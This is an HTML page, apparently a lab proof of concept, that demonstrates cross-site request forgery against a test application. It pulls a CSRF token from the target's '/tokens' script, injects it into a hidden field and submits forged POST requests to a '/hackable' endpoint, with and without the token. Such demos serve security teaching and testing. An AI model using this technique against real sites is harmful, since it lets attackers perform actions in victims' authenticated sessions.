<script src="http://test-app.dev/tokens" type="text/javascript"></script>
<script type="text/javascript">
  $(function() {
    var token = $("meta[name='csrf-param']").attr('content');
    $('#your_token').val(token);
  });
</script>

<form accept-charset="UTF-8" action="http://test-app.dev/hackable" method="post">
  <div style="margin:0;padding:0;display:inline">
    <input name="utf8" type="hidden" value="&#x2713;" />
    <input id="your_token" name="authenticity_token" type="hidden" value="" />
  </div>
  <input name="commit" type="submit" value="Hack with Token" />
</form>
<form accept-charset="UTF-8" action="http://test-app.dev/hackable" method="post">
  <div style="margin:0;padding:0;display:inline">
    <input name="utf8" type="hidden" value="&#x2713;" />
  </div>
  <input name="commit" type="submit" value="Hack with no Token" />
</form>
